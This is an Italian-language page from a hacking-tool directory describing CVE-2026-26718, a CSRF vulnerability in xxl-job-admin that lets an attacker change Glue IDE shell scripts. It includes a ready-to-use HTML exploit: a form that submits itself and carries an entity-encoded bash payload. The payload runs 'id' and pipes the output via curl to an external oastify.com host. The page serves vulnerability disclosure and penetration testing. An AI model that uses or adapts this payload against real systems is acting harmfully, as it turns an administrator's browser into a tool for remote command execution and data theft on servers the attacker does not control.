Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-26718 — Una vulnerabilità di Cross-Site Request Forgery (CSRF) esiste nell'applicazione web xxl-job-admin che consente a un utente malintenzionato di effettuare modifiche non autorizzate agli script shell di Glue IDE. L'endpoint interessato manca di una corretta validazione del token CSRF e accetta metodi HTTP arbitrari tramite un mapping di richiesta permissivo. | Kitploit
Strumenti/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
Analisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

Vedi Repository
131 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Una vulnerabilità di Cross-Site Request Forgery (CSRF) esiste nell'applicazione web xxl-job-admin che consente a un utente malintenzionato di effettuare modifiche non autorizzate agli script shell di Glue IDE. L'endpoint interessato manca di una corretta validazione del token CSRF e accetta metodi HTTP arbitrari tramite un mapping di richiesta permissivo.

Condividi

Descrizione

Riepilogo

Una vulnerabilità di Cross-Site Request Forgery (CSRF) esiste nell'applicazione web xxl-job-admin che consente a un utente malintenzionato di effettuare modifiche non autorizzate agli script shell di Glue IDE. L'endpoint interessato manca di una corretta validazione del token CSRF e accetta metodi HTTP arbitrari tramite un mapping delle richieste permissivo.

Prodotti affetti

root@kitploit:~
xxl-job < 3.4.0

Impatto

Un utente malintenzionato può indurre un amministratore autenticato a effettuare modifiche non autorizzate agli script shell di Glue IDE.

Prova di concetto

Slide1 Slide2 Slide3 Slide4

Payload

root@kitploit:~

// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Ringraziamenti a Ibrahim Sartawi

Scarica lo strumento